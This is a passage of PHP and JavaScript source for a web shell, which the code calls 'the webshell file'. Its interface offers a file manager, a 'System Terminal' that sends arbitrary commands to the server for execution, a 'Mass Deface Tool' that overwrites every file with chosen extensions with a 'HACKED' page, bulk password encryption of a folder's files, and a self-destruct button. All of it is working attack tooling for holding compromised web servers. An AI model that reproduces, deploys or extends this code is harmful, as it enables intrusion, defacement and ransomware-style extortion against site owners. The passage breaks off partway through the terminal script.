    </div>
    <div class="search-box">
        <h3 class="section-title">🔍 Search Files</h3>
        <form method="get" class="search-form" id="searchForm">
            <input type="hidden" name="a" value="search">
            <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
            <input type="text" name="q" class="search-input" placeholder="Search files and folders..." value="' . (isset($search_query) ? htmlspecialchars($search_query) : '') . '" id="searchInput" autocomplete="off">
            <button type="submit" class="path-btn">🔍 Search</button>
        </form>
        <div class="search-suggestions" id="searchSuggestions"></div>';
        
if (isset($search_query) && !empty($search_query)) {
    echo '<div class="search-results">';
    if (!empty($search_results)) {
        echo '<h4 style="color:var(--primary); margin-bottom:10px; font-size:13px;">Found ' . count($search_results) . ' result(s):</h4>';
        foreach ($search_results as $f) {
            $encrypted = isEncrypted($f['path']);
            $isDir = $f['is_dir'];
            $icon = $isDir ? '📁' : '📄';
            $size = $isDir ? 'Directory' : formatBytes($f['size']);
            
            echo '<div class="file-item" id="search-result-' . md5($f['path']) . '">
                    <div class="file-icon">' . $icon . '</div>
                    <div class="file-info">
                        <div class="file-name">' . htmlspecialchars($f['name']) . '</div>
                        <div class="file-details">
                            <span class="file-detail">📏 ' . $size . '</span>
                            <span class="file-detail">🔒 ' . $f['perm'] . '</span>
                            <span class="file-detail">🕐 ' . $f['time'] . '</span>
                            ' . ($encrypted ? '<span class="file-detail" style="color:#ff4444">🔐 ENCRYPTED</span>' : '') . '
                        </div>
                    </div>
                    <div class="file-actions">';
            
            if ($isDir) {
                echo '<a href="?a=index&p=' . urlencode($f['path']) . '">
                        <button class="file-btn">📂 Open</button>
                      </a>';
            } else {
                echo '<button class="file-btn" onclick="editFile(\'' . addslashes($f['path']) . '\')">
                        ✏️ Edit
                      </button>
                      <a href="?a=download&f=' . urlencode($f['path']) . '" download>
                        <button class="file-btn">📥 Download</button>
                      </a>';
            }
            
            echo '  <button class="file-btn" onclick="scrollToFile(\'' . addslashes($f['path']) . '\')">
                        🔍 Locate
                    </button>
                  </div>
                </div>';
        }
    } else {
        echo '<div style="text-align: center; padding: 15px; color: var(--text-secondary); font-size: 13px;">
                🔍 No results found for "' . htmlspecialchars($search_query) . '"
              </div>';
    }
    echo '</div>';
}
echo '</div>
    <div class="upload-box">
        <h3 class="section-title">📤 Upload Files</h3>
        <form method="post" enctype="multipart/form-data" id="uploadForm">
            <input type="hidden" name="a" value="upload">
            <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
            <input type="file" class="form-input" name="upload[]" multiple accept="*/*">
            <button type="submit" class="btn-primary">
                📤 Upload Selected Files
            </button>
        </form>
    </div>
    <div class="create-forms">
        <div class="create-form">
            <h3 class="section-title">📄 Create File</h3>
            <form method="post">
                <input type="hidden" name="a" value="newfile">
                <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
                <input type="text" name="filename" class="form-input" placeholder="filename.ext" required>
                <button type="submit" class="btn-primary">➕ Create File</button>
            </form>
        </div>
        <div class="create-form">
            <h3 class="section-title">📁 Create Folder</h3>
            <form method="post">
                <input type="hidden" name="a" value="newfolder">
                <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
                <input type="text" name="foldername" class="form-input" placeholder="Folder Name" required>
                <button type="submit" class="btn-primary">📁 Create Folder</button>
            </form>
        </div>
    </div>
    <div class="files-container">
        <div class="files-header">
            <h3 class="section-title">📄 Files & Directories</h3>
            <div class="files-count">' . count(listFiles($path)) . ' items</div>
        </div>
        <div class="batch-controls" id="batchControls">
            <input type="checkbox" id="selectAll" class="batch-checkbox" onchange="toggleAllCheckboxes()">
            <label for="selectAll" class="batch-label">Select All</label>
            <div class="batch-actions">';

$hasEncryptedFiles = false;
$hasRegularFiles = false;
$files = listFiles($path);
foreach ($files as $f) {
    if (!$f['is_dir']) {
        if (isEncrypted($f['path'])) {
            $hasEncryptedFiles = true;
        } else {
            $hasRegularFiles = true;
        }
    }
}

echo '              <button type="button" class="batch-btn" onclick="batchAction(\'zip\')">🗜️ Zip</button>';

if ($hasRegularFiles) {
    echo '<button type="button" class="batch-btn" onclick="showBatchEncryptModal()">🔐 Encrypt</button>';
}
if ($hasEncryptedFiles) {
    echo '<button type="button" class="batch-btn" onclick="showBatchDecryptModal()">🔓 Decrypt</button>';
}

echo '              <button type="button" class="batch-btn danger" onclick="batchAction(\'delete\')">🗑️ Delete</button>
                <button type="button" class="batch-btn" onclick="clearSelection()">❌ Clear</button>
            </div>
        </div>
        <form id="batchForm" method="post" style="display: none;">
            <input type="hidden" name="a" id="batchActionType">
            <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
        </form>
        <div class="file-list" id="fileList">';

$files = listFiles($path);
if (empty($files)) {
    echo '<div style="text-align: center; padding: 20px; color: var(--text-secondary); font-size: 13px;">
            📁 Empty directory
          </div>';
} else {
    foreach ($files as $f) {
        $encrypted = isEncrypted($f['path']);
        $isDir = $f['is_dir'];
        $icon = $isDir ? '📁' : '📄';
        $size = $isDir ? 'Directory' : formatBytes($f['size']);
        
        echo '<div class="file-item" data-path="' . htmlspecialchars($f['path']) . '" data-name="' . htmlspecialchars($f['name']) . '" data-type="' . ($isDir ? 'dir' : 'file') . '" data-encrypted="' . ($encrypted ? '1' : '0') . '">
                <input type="checkbox" class="file-checkbox" name="selected_files[]" value="' . htmlspecialchars($f['path']) . '" onchange="updateBatchControls()">
                <div class="file-icon">' . $icon . '</div>
                <div class="file-info">
                    <div class="file-name">' . htmlspecialchars($f['name']) . '</div>
                    <div class="file-details">
                        <span class="file-detail">📏 ' . $size . '</span>
                        <span class="file-detail">🔒 ' . $f['perm'] . '</span>
                        <span class="file-detail">🕐 ' . $f['time'] . '</span>
                        ' . ($encrypted ? '<span class="file-detail" style="color:#ff4444">🔐 ENCRYPTED</span>' : '') . '
                    </div>
                </div>
                <div class="file-actions">';
        
        if ($isDir) {
            echo '<a href="?a=index&p=' . urlencode($f['path']) . '">
                    <button class="file-btn">📂 Open</button>
                  </a>';
        } else {
            echo '<button class="file-btn" onclick="editFile(\'' . addslashes($f['path']) . '\')">
                    ✏️ Edit
                  </button>
                  <a href="?a=download&f=' . urlencode($f['path']) . '" download>
                    <button class="file-btn">📥 Download</button>
                  </a>';
            
            if ($encrypted) {
                echo '<button class="file-btn" onclick="showDecryptModal(\'' . addslashes($f['path']) . '\')">
                        🔓 Decrypt
                      </button>';
            } else {
                echo '<button class="file-btn" onclick="showEncryptModal(\'' . addslashes($f['path']) . '\')">
                        🔐 Encrypt
                      </button>';
            }
        }
        
        echo '  <button class="file-btn" onclick="showRenameModal(\'' . addslashes($f['path']) . '\', \'' . addslashes($f['name']) . '\')">
                    🏷️ Rename
                </button>
                <button class="file-btn" onclick="showChmodModal(\'' . addslashes($f['path']) . '\', \'' . $f['perm'] . '\')">
                    🔧 Chmod
                </button>
                <form method="post" style="display:inline" onsubmit="return confirm(\'Delete ' . ($isDir ? 'folder' : 'file') . '?\')">
                    <input type="hidden" name="a" value="delete">
                    <input type="hidden" name="f" value="' . htmlspecialchars($f['path']) . '">
                    <button type="submit" class="file-btn danger">🗑️ Delete</button>
                </form>
              </div>
            </div>';
    }
}

echo '</div>
    </div>
</div>
<div id="terminal" class="tab-content ' . ($action == 'terminal' ? 'active' : '') . '">
    <div class="terminal-container">
        <div class="terminal-header">
            <span>💻 System Terminal</span>
            <span style="font-size:11px; opacity:0.8">' . php_uname('s') . ' - ' . php_uname('r') . '</span>
        </div>
        <div class="terminal-body">
            <div class="terminal-output" id="terminalOutput">';
if (isset($_SESSION['terminal_output'])) {
    echo htmlspecialchars($_SESSION['terminal_output']);
    unset($_SESSION['terminal_output']);
} else {
    echo '>';
}
echo '</div>
            <div class="terminal-input-container">
                <div class="terminal-prompt">&gt;</div>
                <input type="text" class="terminal-input" id="terminalCommand" placeholder="Enter command..." autocomplete="off" autofocus>
            </div>
            <div class="terminal-history" id="terminalHistory"></div>
        </div>
    </div>
</div>
<div id="deface" class="tab-content ' . ($action == 'deface' ? 'active' : '') . '">
    <div class="deface-box">
        <h3 class="section-title">🎯 Mass Deface Tool</h3>
        <div class="deface-method">
            <button type="button" class="method-btn active" onclick="setDefaceMethod(\'upload\')">
                📤 Upload File
            </button>
            <button type="button" class="method-btn" onclick="setDefaceMethod(\'code\')">
                📝 Insert Code
            </button>
        </div>
        <form method="post" enctype="multipart/form-data">
            <input type="hidden" name="a" value="massdeface">
            <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
            <input type="hidden" name="method" id="defaceMethod" value="upload">
            <div class="form-input" style="margin-bottom:12px">
                <label style="display:block; margin-bottom:6px; color:var(--primary); font-size:13px">Target Extensions:</label>
                <input type="text" name="extensions" value="html,htm,php,js,css,txt,asp,aspx" 
                       placeholder="Comma separated extensions" style="width:100%; font-size:13px" required>
            </div>
            <div id="defaceUpload" class="deface-section active">
                <div class="form-input">
                    <label style="display:block; margin-bottom:6px; color:var(--primary); font-size:13px">Select Deface File:</label>
                    <input type="file" name="deface_file" accept=".html,.htm,.php,.txt,.js,.css" required>
                </div>
            </div>
            <div id="defaceCode" class="deface-section">
                <div class="form-input">
                    <label style="display:block; margin-bottom:6px; color:var(--primary); font-size:13px">Deface Code:</label>
                    <textarea name="code" rows="6" placeholder="<html><body><h1>HACKED</h1></body></html>" style="width:100%; font-family:monospace; font-size:13px"></textarea>
                </div>
            </div>
            <button type="submit" class="btn-primary danger" onclick="return confirm(\'⚠️ This will modify ALL files with specified extensions. Continue?\')">
                🚀 Execute Mass Deface
            </button>
        </form>
    </div>
</div>
<div id="editModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            ✏️ Edit File
            <button onclick="closeModal(\'editModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <textarea id="editContent" class="modal-textarea" spellcheck="false"></textarea>
            <input type="hidden" id="editFilePath">
            <div class="modal-actions">
                <button onclick="saveFile()" class="path-btn" style="min-width:100px; flex:1">💾 Save</button>
                <button onclick="closeModal(\'editModal\')" class="quick-btn" style="flex:1">❌ Close</button>
            </div>
        </div>
    </div>
</div>
<div id="encryptModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🔐 Encrypt File
            <button onclick="closeModal(\'encryptModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <p style="margin-bottom:12px; color:var(--text-secondary); font-size:13px">Enter password for encryption:</p>
            <form id="encryptForm" method="post">
                <input type="hidden" name="a" value="encryptfile">
                <input type="hidden" id="encryptFile" name="f">
                <input type="password" name="pass" class="encrypt-input" placeholder="Encryption password" required autocomplete="new-password">
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1">🔐 Encrypt</button>
                    <button type="button" onclick="closeModal(\'encryptModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
<div id="decryptModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🔓 Decrypt File
            <button onclick="closeModal(\'decryptModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <p style="margin-bottom:12px; color:var(--text-secondary); font-size:13px">Enter decryption password:</p>
            <form id="decryptForm" method="post">
                <input type="hidden" name="a" value="decryptfile">
                <input type="hidden" id="decryptFile" name="f">
                <input type="password" name="pass" class="encrypt-input" placeholder="Decryption password" required autocomplete="new-password">
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1">🔓 Decrypt</button>
                    <button type="button" onclick="closeModal(\'decryptModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
<div id="renameModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🏷️ Rename
            <button onclick="closeModal(\'renameModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <form id="renameForm" method="post">
                <input type="hidden" name="a" value="rename">
                <input type="hidden" id="renameOld" name="old">
                <input type="text" id="renameNew" name="new" class="form-input" placeholder="New name" required>
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1">💾 Rename</button>
                    <button type="button" onclick="closeModal(\'renameModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
<div id="chmodModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🔧 Change Permissions
            <button onclick="closeModal(\'chmodModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <form id="chmodForm" method="post">
                <input type="hidden" name="a" value="chmod">
                <input type="hidden" id="chmodFile" name="f">
                <input type="text" id="chmodPerm" name="perm" class="form-input" placeholder="e.g., 755 or 644 (3-4 digits)" required pattern="[0-7]{3,4}" title="Enter 3-4 digits (0-7). Example: 755 for directories, 644 for files">
                <div style="margin:12px 0; padding:10px; background:var(--bg); border-radius:var(--radius-xs);">
                    <div style="color:var(--text-secondary); margin-bottom:6px; font-size:13px">Common permissions:</div>
                    <div style="display:flex; gap:6px; flex-wrap:wrap">
                        <button type="button" class="quick-btn" onclick="document.getElementById(\'chmodPerm\').value=\'644\'" style="font-size:11px; padding:6px 10px">644 (File)</button>
                        <button type="button" class="quick-btn" onclick="document.getElementById(\'chmodPerm\').value=\'755\'" style="font-size:11px; padding:6px 10px">755 (Directory)</button>
                        <button type="button" class="quick-btn" onclick="document.getElementById(\'chmodPerm\').value=\'777\'" style="font-size:11px; padding:6px 10px">777 (Full)</button>
                        <button type="button" class="quick-btn" onclick="document.getElementById(\'chmodPerm\').value=\'600\'" style="font-size:11px; padding:6px 10px">600 (Private)</button>
                    </div>
                </div>
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1">💾 Apply</button>
                    <button type="button" onclick="closeModal(\'chmodModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
<div id="encryptFolderModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🔐 Encrypt All Files in Folder
            <button onclick="closeModal(\'encryptFolderModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <p style="margin-bottom:12px; color:var(--text-secondary); font-size:13px">
                This will encrypt ALL files in the current folder. Make sure to remember the password!
            </p>
            <form method="post">
                <input type="hidden" name="a" value="encryptfolder">
                <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
                <input type="password" name="epass" class="encrypt-input" placeholder="Encryption password" required>
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1" onclick="return confirm(\'Encrypt ALL files in this folder?\')">
                        🔐 Encrypt All
                    </button>
                    <button type="button" onclick="closeModal(\'encryptFolderModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
<div id="decryptFolderModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🔓 Decrypt All Files in Folder
            <button onclick="closeModal(\'decryptFolderModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <p style="margin-bottom:12px; color:var(--text-secondary); font-size:13px">
                This will decrypt ALL encrypted files in the current folder.
            </p>
            <form method="post">
                <input type="hidden" name="a" value="decryptfolder">
                <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
                <input type="password" name="dpass" class="encrypt-input" placeholder="Decryption password" required>
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1" onclick="return confirm(\'Decrypt ALL files in this folder?\')">
                        🔓 Decrypt All
                    </button>
                    <button type="button" onclick="closeModal(\'decryptFolderModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
<div id="batchEncryptModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🔐 Encrypt Selected Files
            <button onclick="closeModal(\'batchEncryptModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <p style="margin-bottom:12px; color:var(--text-secondary); font-size:13px">
                This will encrypt all selected files that are not already encrypted.
            </p>
            <form id="batchEncryptForm" method="post">
                <input type="hidden" name="a" value="batchencrypt">
                <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
                <div id="batchEncryptFiles"></div>
                <input type="password" name="epass" class="encrypt-input" placeholder="Encryption password" required autocomplete="new-password">
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1">🔐 Encrypt Selected</button>
                    <button type="button" onclick="closeModal(\'batchEncryptModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
<div id="batchDecryptModal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            🔓 Decrypt Selected Files
            <button onclick="closeModal(\'batchDecryptModal\')" style="background:none; border:none; color:#000; font-size:20px; cursor:pointer; padding:0; width:26px; height:26px; display:flex; align-items:center; justify-content:center">×</button>
        </div>
        <div class="modal-body">
            <p style="margin-bottom:12px; color:var(--text-secondary); font-size:13px">
                This will decrypt all selected encrypted files. Files with wrong passwords will be skipped.
            </p>
            <form id="batchDecryptForm" method="post">
                <input type="hidden" name="a" value="batchdecrypt">
                <input type="hidden" name="p" value="' . htmlspecialchars($path) . '">
                <div id="batchDecryptFiles"></div>
                <input type="password" name="dpass" class="encrypt-input" placeholder="Decryption password" required autocomplete="new-password">
                <div class="modal-actions">
                    <button type="submit" class="path-btn" style="flex:1">🔓 Decrypt Selected</button>
                    <button type="button" onclick="closeModal(\'batchDecryptModal\')" class="quick-btn" style="flex:1">Cancel</button>
                </div>
            </form>
        </div>
    </div>
</div>
</div>
</div>
</div>
<script>
function formatBytes(bytes, decimals = 2) {
    if (bytes === 0) return "0 Bytes";
    const k = 1024;
    const dm = decimals < 0 ? 0 : decimals;
    const sizes = ["Bytes", "KB", "MB", "GB", "TB"];
    const i = Math.floor(Math.log(bytes) / Math.log(k));
    return parseFloat((bytes / Math.pow(k, i)).toFixed(dm)) + " " + sizes[i];
}
function showTab(tabId) {
    document.querySelectorAll(".tab-content").forEach(tab => {
        tab.classList.remove("active");
    });
    document.querySelectorAll(".tab-btn").forEach(btn => {
        btn.classList.remove("active");
    });
    document.getElementById(tabId).classList.add("active");
    var tabButtons = document.querySelectorAll(".tab-btn");
    for (var i = 0; i < tabButtons.length; i++) {
        if (tabButtons[i].id === "tab" + tabId.charAt(0).toUpperCase() + tabId.slice(1)) {
            tabButtons[i].classList.add("active");
        }
    }
    localStorage.setItem(\'currentTab\', tabId);
    if (tabId === "terminal") {
        setTimeout(() => {
            const terminalInput = document.getElementById("terminalCommand");
            if (terminalInput) {
                terminalInput.focus();
                terminalInput.scrollIntoView({ behavior: "smooth", block: "center" });
            }
            scrollTerminalToBottom();
        }, 100);
    }
}
function refreshCurrentTab() {
    const currentTab = localStorage.getItem(\'currentTab\') || \'files\';
    if (currentTab === \'files\') {
        location.href = \'?a=index&p=' . urlencode($path) . '\';
    } else if (currentTab === \'terminal\') {
        location.href = \'?a=terminal&p=' . urlencode($path) . '\';
    } else if (currentTab === \'deface\') {
        location.href = \'?a=deface&p=' . urlencode($path) . '\';
    } else {
        location.reload();
    }
}
function closeModal(modalId) {
    document.getElementById(modalId).style.display = "none";
    document.body.style.overflow = "auto";
}
function showModal(modalId) {
    document.getElementById(modalId).style.display = "block";
    document.body.style.overflow = "hidden";
    setTimeout(() => {
        const inputs = document.querySelectorAll("#" + modalId + " input, #" + modalId + " textarea");
        if (inputs.length > 0) inputs[0].focus();
    }, 100);
}
async function editFile(filePath) {
    document.getElementById("editFilePath").value = filePath;
    document.getElementById("editContent").value = "Loading...";
    showModal("editModal");
    try {
        const response = await fetch("?a=getfile&f=" + encodeURIComponent(filePath) + "&t=" + Date.now());
        if (!response.ok) throw new Error("Network error: " + response.status);
        const content = await response.text();
        document.getElementById("editContent").value = content;
        document.getElementById("editContent").focus();
    } catch (error) {
        document.getElementById("editContent").value = "Error loading file: " + error.message;
    }
}
function saveFile() {
    const form = document.createElement("form");
    form.method = "POST";
    form.style.display = "none";
    
    const inputA = document.createElement("input");
    inputA.type = "hidden";
    inputA.name = "a";
    inputA.value = "saveedit";
    form.appendChild(inputA);
    
    const inputF = document.createElement("input");
    inputF.type = "hidden";
    inputF.name = "f";
    inputF.value = document.getElementById("editFilePath").value;
    form.appendChild(inputF);
    
    const inputContent = document.createElement("input");
    inputContent.type = "hidden";
    inputContent.name = "content";
    inputContent.value = document.getElementById("editContent").value;
    form.appendChild(inputContent);
    
    document.body.appendChild(form);
    form.submit();
}
function showEncryptModal(filePath) {
    document.getElementById("encryptFile").value = filePath;
    showModal("encryptModal");
    setTimeout(() => {
        document.querySelector("#encryptForm input[type=password]").focus();
    }, 100);
}
function showDecryptModal(filePath) {
    document.getElementById("decryptFile").value = filePath;
    showModal("decryptModal");
    setTimeout(() => {
        document.querySelector("#decryptForm input[type=password]").focus();
    }, 100);
}
function showBatchEncryptModal() {
    const checkboxes = document.querySelectorAll(\'.file-checkbox:checked\');
    let hasRegularFiles = false;
    const selectedFiles = [];
    
    checkboxes.forEach(cb => {
        const fileItem = cb.closest(\'.file-item\');
        if (fileItem && fileItem.dataset.type === \'file\' && fileItem.dataset.encrypted === \'0\') {
            hasRegularFiles = true;
            selectedFiles.push(cb.value);
        }
    });
    
    if (!hasRegularFiles) {
        alert(\'No regular (non-encrypted) files selected!\');
        return;
    }
    
    const filesContainer = document.getElementById("batchEncryptFiles");
    filesContainer.innerHTML = "";
    
    selectedFiles.forEach(file => {
        const input = document.createElement("input");
        input.type = "hidden";
        input.name = "selected_files[]";
        input.value = file;
        filesContainer.appendChild(input);
    });
    
    showModal("batchEncryptModal");
    setTimeout(() => {
        document.querySelector("#batchEncryptForm input[type=password]").focus();
    }, 100);
}
function showBatchDecryptModal() {
    const checkboxes = document.querySelectorAll(\'.file-checkbox:checked\');
    let hasEncryptedFiles = false;
    const selectedFiles = [];
    
    checkboxes.forEach(cb => {
        const fileItem = cb.closest(\'.file-item\');
        if (fileItem && fileItem.dataset.type === \'file\' && fileItem.dataset.encrypted === \'1\') {
            hasEncryptedFiles = true;
            selectedFiles.push(cb.value);
        }
    });
    
    if (!hasEncryptedFiles) {
        alert(\'No encrypted files selected!\');
        return;
    }
    
    const filesContainer = document.getElementById("batchDecryptFiles");
    filesContainer.innerHTML = "";
    
    selectedFiles.forEach(file => {
        const input = document.createElement("input");
        input.type = "hidden";
        input.name = "selected_files[]";
        input.value = file;
        filesContainer.appendChild(input);
    });
    
    showModal("batchDecryptModal");
    setTimeout(() => {
        document.querySelector("#batchDecryptForm input[type=password]").focus();
    }, 100);
}
function showEncryptFolder() {
    showModal("encryptFolderModal");
    setTimeout(() => {
        document.querySelector("#encryptFolderModal input[type=password]").focus();
    }, 100);
}
function showDecryptFolder() {
    showModal("decryptFolderModal");
    setTimeout(() => {
        document.querySelector("#decryptFolderModal input[type=password]").focus();
    }, 100);
}
function showRenameModal(oldPath, currentName) {
    document.getElementById("renameOld").value = oldPath;
    document.getElementById("renameNew").value = currentName;
    showModal("renameModal");
    setTimeout(() => {
        document.getElementById("renameNew").focus();
        document.getElementById("renameNew").select();
    }, 100);
}
function showChmodModal(filePath, currentPerm) {
    document.getElementById("chmodFile").value = filePath;
    let displayPerm = currentPerm;
    if (currentPerm.length == 4 && currentPerm.charAt(0) == \'0\') {
        displayPerm = currentPerm.substring(1);
    }
    document.getElementById("chmodPerm").value = displayPerm;
    showModal("chmodModal");
    setTimeout(() => {
        document.getElementById("chmodPerm").focus();
        document.getElementById("chmodPerm").select();
    }, 100);
}
function setDefaceMethod(method) {
    document.getElementById("defaceMethod").value = method;
    document.querySelectorAll(".method-btn").forEach(btn => {
        btn.classList.remove("active");
    });
    event.target.classList.add("active");
    document.getElementById("defaceUpload").classList.remove("active");
    document.getElementById("defaceCode").classList.remove("active");
    document.getElementById("deface" + method.charAt(0).toUpperCase() + method.slice(1)).classList.add("active");
}
function selfDestruct() {
    if (confirm("⚠️⚠️⚠️\\n\\nThis will DELETE the webshell file permanently!\\n\\nAre you absolutely sure?")) {
        const form = document.createElement("form");
        form.method = "POST";
        form.style.display = "none";
        const input = document.createElement("input");
        input.type = "hidden";
        input.name = "a";
        input.value = "selfdestruct";
        form.appendChild(input);
        document.body.appendChild(form);
        form.submit();
    }
}
function updateBatchControls() {
    const checkboxes = document.querySelectorAll(\'.file-checkbox:checked\');
    const batchControls = document.getElementById(\'batchControls\');
    if (checkboxes.length > 0) {
        batchControls.style.display = \'flex\';
    } else {
        batchControls.style.display = \'none\';
    }
    document.getElementById(\'selectAll\').checked = checkboxes.length === document.querySelectorAll(\'.file-checkbox\').length;
}
function toggleAllCheckboxes() {
    const selectAll = document.getElementById(\'selectAll\');
    const checkboxes = document.querySelectorAll(\'.file-checkbox\');
    checkboxes.forEach(cb => {
        cb.checked = selectAll.checked;
    });
    updateBatchControls();
}
function clearSelection() {
    const checkboxes = document.querySelectorAll(\'.file-checkbox\');
    checkboxes.forEach(cb => {
        cb.checked = false;
    });
    document.getElementById(\'selectAll\').checked = false;
    updateBatchControls();
}
function batchAction(action) {
    const checkboxes = document.querySelectorAll(\'.file-checkbox:checked\');
    if (checkboxes.length === 0) {
        alert(\'Please select at least one file/folder.\');
        return;
    }
    
    const form = document.getElementById(\'batchForm\');
    const actionInput = document.getElementById(\'batchActionType\');
    
    while (form.firstChild) {
        form.removeChild(form.firstChild);
    }
    
    if (action === \'delete\') {
        if (!confirm(`Are you sure you want to delete ${checkboxes.length} selected item(s)?`)) {
            return;
        }
        actionInput.value = \'batchdelete\';
    } else if (action === \'zip\') {
        if (!confirm(`Create zip archive from ${checkboxes.length} selected item(s)?`)) {
            return;
        }
        actionInput.value = \'batchzip\';
    }
    
    const actionInputClone = actionInput.cloneNode(true);
    form.appendChild(actionInputClone);
    
    const pathInput = document.createElement(\'input\');
    pathInput.type = \'hidden\';
    pathInput.name = \'p\';
    pathInput.value = \'' . htmlspecialchars($path) . '\';
    form.appendChild(pathInput);
    
    checkboxes.forEach(cb => {
        const hiddenInput = document.createElement(\'input\');
        hiddenInput.type = \'hidden\';
        hiddenInput.name = \'selected_files[]\';
        hiddenInput.value = cb.value;
        form.appendChild(hiddenInput);
    });
    
    document.body.appendChild(form);
    form.submit();
}
function scrollToFile(filePath) {
    const fileItems = document.querySelectorAll(\'.file-item\');
    for (const item of fileItems) {
        if (item.dataset.path === filePath) {
            item.scrollIntoView({ behavior: \'smooth\', block: \'center\' });
            item.style.backgroundColor = \'rgba(0, 255, 136, 0.2)\';
            item.style.borderColor = \'var(--primary)\';
            setTimeout(() => {
                item.style.backgroundColor = \'\';
                item.style.borderColor = \'transparent\';
            }, 2000);
            break;
        }
    }
}
function scrollTerminalToBottom() {
    const terminalOutput = document.getElementById(\'terminalOutput\');
    if (terminalOutput) {
        terminalOutput.scrollTop = terminalOutput.scrollHeight;
    }
}
function resizeTerminal() {
    const terminalContainer = document.querySelector(\'.terminal-container\');
    const windowHeight = window.innerHeight;
    const headerHeight = document.querySelector(\'.app-header\').offsetHeight;
    const tabsHeight = document.querySelector(\'.tabs-container\').offsetHeight;
    const mainContentPadding = 30;
    
    const availableHeight = windowHeight - headerHeight - tabsHeight - mainContentPadding - 50;
    const minHeight = 300;
    const maxHeight = 600;
    
    let newHeight = Math.max(minHeight, Math.min(maxHeight, availableHeight));
    terminalContainer.style.height = newHeight + \'px\';
    
    const terminalBody = document.querySelector(\'.terminal-body\');
    if (terminalBody) {
        const terminalHeader = document.querySelector(\'.terminal-header\').offsetHeight;
        const terminalInput = document.querySelector(\'.terminal-input-container\').offsetHeight;
        terminalBody.style.height = (newHeight - terminalHeader - terminalInput) + \'px\';
    }
}
let commandHistory = [];
let historyIndex = -1;
let lastSearchQuery = "";
document.addEventListener("DOMContentLoaded", function() {
    const terminalCommand = document.getElementById("terminalCommand");
    const terminalOutput = document.getElementById("terminalOutput");
    const searchInput = document.getElementById("searchInput");
    const searchSuggestions = document.getElementById("searchSuggestions");
    
    const savedTab = localStorage.getItem(\'currentTab\') || \'files\';
    if (savedTab && document.getElementById(savedTab)) {
        showTab(savedTab);
    }
    
    if (terminalCommand) {
        terminalCommand.focus();
        
        terminalCommand.addEventListener("keydown", function(e) {
            if (e.key === "Enter") {
                const command = terminalCommand.value.trim();
                if (command) {
                    terminalOutput.innerHTML += "\\n> " + command;
                    
                    const form = document.createElement("form");
                    form.method = "POST";
                    form.style.display = "none";
                    
                    const inputA = document.createElement("input");
                    inputA.type = "hidden";
                    inputA.name = "a";
                    inputA.value = "exec";
                    form.appendChild(inputA);
                    
                    const inputCmd = document.createElement("input");
                    inputCmd.type = "hidden";
                    inputCmd.name = "cmd";
                    inputCmd.value = command;
                    form.appendChild(inputCmd);
                    
                    const inputPath = document.createElement("input");
                    inputPath.type = "hidden";
                    inputPath.name = "p";
                    inputPath.value = \'' . $path . '\';
                    form.appendChild(inputPath);
                    
                    document.body.appendChild(form);
                    form.submit();
                }
                terminalCommand.value = "";
                scrollTerminalToBottom();
            } else if (e.key === "ArrowUp") {
                e.preventDefault();
                if (commandHistory.length > 0) {
                    if (historyIndex === -1) {
                        historyIndex = commandHistory.length - 1;
                    } else if (historyIndex > 0) {
